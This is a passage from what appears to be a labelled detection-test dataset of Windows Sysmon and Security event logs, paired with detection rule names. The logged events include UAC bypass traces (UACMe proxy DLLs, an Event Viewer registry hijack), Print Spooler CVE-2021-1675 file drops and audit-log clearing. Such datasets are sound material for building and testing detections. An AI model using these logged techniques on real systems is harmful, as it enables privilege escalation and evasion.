File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:02.305","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FE2A-5CD6-0000-00107E091700","ProcessId":2028,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:54:02.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15987,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:02.305766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:07.462","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FE2F-5CD6-0000-001019201700","ProcessId":2956,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 
16:54:07.462"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15989,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:07.524516Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"byeintegrity5-uac.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\privesc\\uac\\","Description":"?","FileVersion":"?","Hashes":"SHA1=DF21EC2A3D7EE2AE853C29CBD8AB774A78ED7BF4,MD5=8671D1F95CC31E33F61DEF8C99B42B64,SHA256=2D41A174EA0589F39AA267F829870131AE18CFF1B19648C118DC5A00AEAF078B,IMPHASH=EA12F696E9727F4454BA1EFA0CAFAD2D","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-3404-5FBE-0000-002044CA0600","LogonId":"0x6ca44","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-BB27-5FBF-0000-0010F69CFA0A","ParentProcessId":12228,"ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-11-26 
17:38:11.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2362764,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.138458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-11-26 17:38:11.146","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetFilename":"C:\\Users\\Public\\tools\\privesc\\uac\\system32\\npmproxy.dll","UtcTime":"2020-11-26 17:38:11.146"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2362765,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.147605Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\privesc\\uac","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1586556212-2165235939-1437495523-1001\\Environment\\systemroot","UtcTime":"2020-11-26 17:38:11.151"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2362767,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.152295Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:06:53.846","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-78DD-5D45-0000-0010B8A50301","ProcessId":5080,"RuleName":"PrivEsc - UAC Bypass UACME 23","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll","UtcTime":"2019-08-03 
12:06:53.846"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5429,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:06:53.933988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-04 09:33:57.716","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A685-5D46-0000-00109B2AD703","ProcessId":3916,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-04 09:33:57.716"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5763,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:33:57.800853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 15:08:06.372","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A356-5D45-0000-001029AA9901","ProcessId":4480,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","UtcTime":"2019-08-03 15:08:06.372"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5527,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:06.419322Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Hazardous Environments","Description":"UACMe proxy DLL","FileVersion":"3.1.9.1905","Hashes":"SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847","Image":"C:\\Windows\\System32\\mmc.exe","ImageLoaded":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","ProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ProcessId":4056,"Product":"UACMe","RuleName":"Execution - Image Loaded from suspicious path","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-08-03 
15:08:07.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":5531,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.508962Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" eventvwr.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ParentProcessId":4056,"ProcessGuid":"747F3D96-A357-5D45-0000-0010BD149A01","ProcessId":5396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 
15:08:07.355"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5532,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T15:08:07.558917Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-09 01:59:28.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11112,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:28.669022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"\"C:\\Windows\\system32\\eventvwr.exe\" ","ParentImage":"C:\\Windows\\System32\\eventvwr.exe","ParentProcessGuid":"365ABB72-8980-5CD3-0000-00105F451F00","ParentProcessId":3884,"ProcessGuid":"365ABB72-8980-5CD3-0000-0010134D1F00","ProcessId":3840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 01:59:28.903"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11116,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T01:59:29.090897Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1102,"EventRecordID":161471,"Execution_attributes":{"ProcessID":1276,"ThreadID":6720},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T18:04:36.333991Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x52a7d","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 13:50:26.727","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9122-5D45-0000-0010710D6101","ProcessId":3508,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-03 13:50:26.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5518,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T13:50:26.782725Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC 
Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:31:14.985","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7E92-5D45-0000-0010FF472601","ProcessId":4884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\GdiPlus.dll","UtcTime":"2019-08-03 12:31:14.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5487,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:31:15.096244Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Using Consent and Comctl32 - File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:08:13.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-792D-5D45-0000-00104F190601","ProcessId":5336,"RuleName":"PrivEsc - UAC Bypass UACME 22","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll","UtcTime":"2019-08-03 
12:08:13.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5438,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:08:13.818381Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342291,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551382Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New","UtcTime":"2020-08-12 
13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342292,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551399Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.DLL","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342293,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.551413Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 
13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRVUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342294,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562442Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.GPD","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342295,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562798Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342296,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562856Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342297,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.562922Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation 
